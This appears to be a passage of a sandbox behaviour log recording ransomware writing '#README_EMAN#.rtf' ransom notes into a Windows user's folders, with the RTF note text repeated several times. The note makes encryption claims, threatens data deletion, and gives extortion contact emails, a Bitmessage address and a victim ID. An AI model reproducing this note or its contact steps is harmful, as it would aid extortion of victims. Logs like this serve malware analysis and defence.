m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\niYS»\x07³\x98'\x9eQ_Ú$\x9e5ã­:f£1}m\x03\x1d", lpUsedDefaultChar=0x0) returned 8717 [0293.370] WriteFile (in: hFile=0x2d4, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0293.371] CloseHandle (hObject=0x2d4) returned 1 [0293.371] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\#readme_eman#.rtf")) returned 0x20 [0293.372] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\#readme_eman#.rtf")) returned 0xffffffff [0293.372] GetLastError () returned 0x2 [0293.372] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0293.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0293.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0293.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 